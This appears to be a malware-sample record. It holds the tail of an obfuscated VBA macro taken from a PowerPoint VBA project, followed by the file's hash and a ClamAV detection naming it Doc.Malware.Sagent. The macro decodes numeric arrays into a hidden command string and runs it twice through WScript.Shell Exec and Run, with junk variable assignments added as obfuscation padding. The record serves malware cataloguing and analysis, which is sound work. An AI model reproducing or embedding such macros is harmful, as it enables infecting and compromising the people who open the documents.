xzjtj = Array(426)
tgyc xzjtj, vyzwggj
azsjuw = Array(419, 424, 424, 429, 419)
tgyc azsjuw, vyzwggj
ybfwjd = Array(432)
tgyc ybfwjd, vyzwggj
xhyhsuy = Array(430, 419, 424, 424, 427)
tgyc xhyhsuy, vyzwggj
xidb = Array(419, 424)
tgyc xidb, vyzwggj
cafwhi = Array(424, 429, 419, 427)
tgyc cafwhi, vyzwggj
tstaj = Array(428)
tgyc tstaj, vyzwggj
ywtsbxg = Array(419, 431, 423, 419, 424, 424)
tgyc ywtsbxg, vyzwggj
icjxiwg = Array(427, 419, 424, 424, 424, 419)
tgyc icjxiwg, vyzwggj
siviy = Array(432, 432, 419, 424, 423, 424, 419, 424, 424, 428, 419, 424)
tgyc siviy, vyzwggj
ytahazx = Array(424, 428, 419, 426, 425, 419, 426, 429)
tgyc ytahazx, vyzwggj
hfcdbwu = Array(419, 424, 423, 428, 419, 424, 423, 426, 419, 424, 424, 432, 419, 424, 423, 427, 419, 424, 425)
tgyc hfcdbwu, vyzwggj
tcxasv = Array(424, 419, 424, 423, 424, 419, 428, 432, 419, 424, 425)
tgyc tcxasv, vyzwggj
bjdzut = Array(428)
tgyc bjdzut, vyzwggj
hfxbydc = Array(419, 432)
tgyc hfxbydc, vyzwggj
ysvze = Array(432, 419, 432, 430, 419, 424, 424, 429, 419, 432, 432, 419, 424, 423, 427, 419, 424, 425, 426, 419, 424, 425, 428)
tgyc ysvze, vyzwggj
cifz = Array(419)
tgyc cifz, vyzwggj
hibbvdh = Array(428, 432)
tgyc hibbvdh, vyzwggj
vacuaj = Array(499, 412, 498, 411, 472, 418, 436, 466, 474)
tgyc vacuaj, vyzwggj
fbgw = Array(479, 472, 489, 468)
tgyc fbgw, vyzwggj
xjssv = Array(411)
tgyc xjssv, vyzwggj
agxdzz = Array(470, 500, 434, 480, 476, 495, 407, 411, 472)
tgyc agxdzz, vyzwggj
ijigtah = Array(434)
tgyc ijigtah, vyzwggj
vidse = -72577
yfhiv = -85971
CreateObject("WScript.Shell").Exec vyzwggj
yizd = -74134
zgtt = -11719
ucxefec = -76352
sjdubz = -90044
echz = -9292
CreateObject("WScript.Shell").Run vyzwggj
xvyi = -55592
ithtxfu = -99109
yggiyx = -61570
gsfubjj = -36572
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 68608 bytes |

SHA-256: b4255e062f2910cceef4c0e0c502dd1bfce3749b7cee1a7ce301c72fa0ca3eb3

Detection
ClamAV: Doc.Malware.Sagent-6951618-0
Obfuscation or payload: unlikely